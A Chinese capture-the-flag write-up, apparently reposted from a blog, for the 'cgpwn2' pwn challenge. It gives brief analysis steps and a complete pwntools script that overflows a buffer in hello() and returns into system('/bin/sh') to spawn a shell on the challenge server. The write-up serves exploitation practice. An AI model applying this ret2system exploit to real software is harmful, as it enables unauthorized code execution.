zoukankan html css js c++ java

攻防世界—pwn—cgpwn2

题目分析

题目提示

checksec检查文件保护机制

使用ida查看伪代码

hello函数存在溢出，与level2类似

信息收集

system地址

name的地址

编写脚本

from pwn import *
p = remote('111.198.29.45',42844)
#p = process("./pwn006")
binsh = "/bin/sh"
system = 0x8048420
name = 0x804A080
payload = "A"*0x26+"B"*0x4+p32(system)+p32(0)+p32(name)
p.sendlineafter("please tell me your name",binsh)
p.sendlineafter("hello,you can leave some message here:",payload)
p.interactive()

本地测试

靶机测试

查看全文

相关阅读:
PHP microtime() 函数
 PHP localtime() 函数
 PHP idate() 函数
 PHP gmstrftime() 函数
 Orchestrator安装
 [BJOI2017]开车
 cant found Microsoft.VSSDK.BuildTools.15.0.26201
如何移动 nuget 缓存文件夹
 如何移动 nuget 缓存文件夹
 如何移动 nuget 缓存文件夹

原文地址：https://www.cnblogs.com/anweilx/p/12631129.html

Copyright © 2011-2022 走看看